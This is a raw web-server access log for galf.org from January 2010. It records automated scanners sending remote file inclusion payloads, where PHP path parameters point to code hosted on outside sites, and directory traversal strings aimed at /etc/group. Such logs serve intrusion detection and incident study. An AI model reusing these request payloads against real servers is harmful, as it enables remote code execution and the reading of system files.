67.19.194.26 - - [18/Jan/2010:01:21:30 -0800] "GET /logs/access_091116.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:21:31 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:21:34 -0800] "GET /logs/access_090727.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:21:35 -0800] "GET /logs/access_090727.log%20%20//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:21:52 -0800] "GET /logs/access_090907.log//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:21:52 -0800] "GET /skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:21:52 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:24 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:24 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:24 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:27 -0800] "GET /skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:27 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:27 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:50 -0800] "GET /logs/access_090907.log//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:50 -0800] "GET /skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:22:50 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:01:23:08 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.253.63.102 - - [18/Jan/2010:01:24:07 -0800] "GET /logs/access_090907.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:24:07 -0800] "GET /index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:24:09 -0800] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:24:12 -0800] "GET /index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:24:12 -0800] "GET /logs//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:24:13 -0800] "GET /logs/access_090907.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:27 -0800] "GET /logs/access_090921.log%20%20/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:27 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:27 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:28 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:28 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:28 -0800] "GET /logs/access_090921.log%20%20/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [18/Jan/2010:01:24:34 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [18/Jan/2010:01:24:34 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:35 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:35 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:35 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [18/Jan/2010:01:24:36 -0800] "GET /logs/access_100111.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:41 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:41 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:41 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:44 -0800] "GET /logs/access_090713.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:44 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:44 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:50 -0800] "GET /logs/access_090713.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:50 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:50 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:24:54 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:24:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:54 -0800] "GET /logs/access_090713.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:54 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:24:54 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:24:54 -0800] "GET /skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:13 -0800] "GET /logs/access_090713.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:13 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:13 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:29 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:30 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:30 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:25:47 -0800] "GET /logs/access_091123.log/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:25:47 -0800] "GET /mcf.php?content=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:25:47 -0800] "GET /logs/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:25:47 -0800] "GET /logs/access_091123.log/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:25:47 -0800] "GET /logs/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:25:47 -0800] "GET /mcf.php?content=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:51 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:51 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:51 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:57 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:57 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:57 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:58 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:59 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:59 -0800] "GET /logs/?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:25:59 -0800] "GET /?mosConfig_absolute_path=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:59 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:59 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:25:59 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:00 -0800] "GET /logs/access_090928.log%20%20/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:02 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:02 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:03 -0800] "GET /logs/access_090928.log%20%20/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:26:04 -0800] "GET /logs/access_090928.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:04 -0800] "GET /skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:05 -0800] "GET /logs/access_090921.log%20%20/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:06 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:06 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:06 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:06 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:26:07 -0800] "GET /logs/access_090928.log//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:13 -0800] "GET /logs/access_090928.log%20%20/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:13 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:13 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:13 -0800] "GET /logs/access_090921.log%20%20/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:15 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:15 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:15 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:15 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:16 -0800] "GET /logs/access_091116.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:18 -0800] "GET /logs/access_090928.log%20%20/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:18 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:18 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:22 -0800] "GET /logs/access_090727.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:22 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:22 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [18/Jan/2010:01:26:22 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:27 -0800] "GET /logs/access_090928.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:27 -0800] "GET /logs/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:27 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:30 -0800] "GET /logs/access_090921.log/?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:32 -0800] "GET /logs/access_091116.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:26:36 -0800] "GET /logs/access_090727.log//skin/zero_vote/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.78.118.94 - - [18/Jan/2010:01:28:09 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.78.118.94 - - [18/Jan/2010:01:28:09 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.78.118.94 - - [18/Jan/2010:01:28:10 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.253.63.102 - - [18/Jan/2010:01:28:29 -0800] "GET /logs/access_090907.log%20%20//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:28:33 -0800] "GET /logs/access_090907.log%20%20//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:28:45 -0800] "GET /logs/access_090928.log%20%20//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:29:48 -0800] "GET /logs/access_091012.log/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
209.200.245.35 - - [18/Jan/2010:01:29:48 -0800] "GET /logs/access_091012.log/mcf.php?content=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:29:59 -0800] "GET /index.php?pagina=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:29:59 -0800] "GET /logs/access_090720.log/index.php?pagina=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:29:59 -0800] "GET /logs/index.php?pagina=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:29:59 -0800] "GET /logs/index.php?pagina=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:29:59 -0800] "GET /logs/access_090720.log/index.php?pagina=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:29:59 -0800] "GET /index.php?pagina=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:30:00 -0800] "GET /logs/access_090629.log/index.php?pagina=./../../../../../../../../../../../../../../../../etc/group%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
65.182.188.34 - - [18/Jan/2010:01:30:00 -0800] "GET /logs/access_090629.log/index.php?pagina=./../../../../../../../../../../../../../../../../etc/group HTTP/1.1" 404 - "-" "-" "www.galf.org"
87.253.63.102 - - [18/Jan/2010:01:30:01 -0800] "GET /logs/access_090928.log%20%20//index2.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://krupuk.110mb.com/res1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [18/Jan/2010:01:30:01 -0800] "GET /logs/access_090928.log%20%20//skin/zero_vote/error.php?dir=http://www.profitbiz.ru/images/CyberUN1/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
79.170.45.126 - - [18/Jan/2010:01:30:06 -0800] "GET /logs/access_090921.log/arcade.php?phpbb_root_path=http://www.aimadis.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
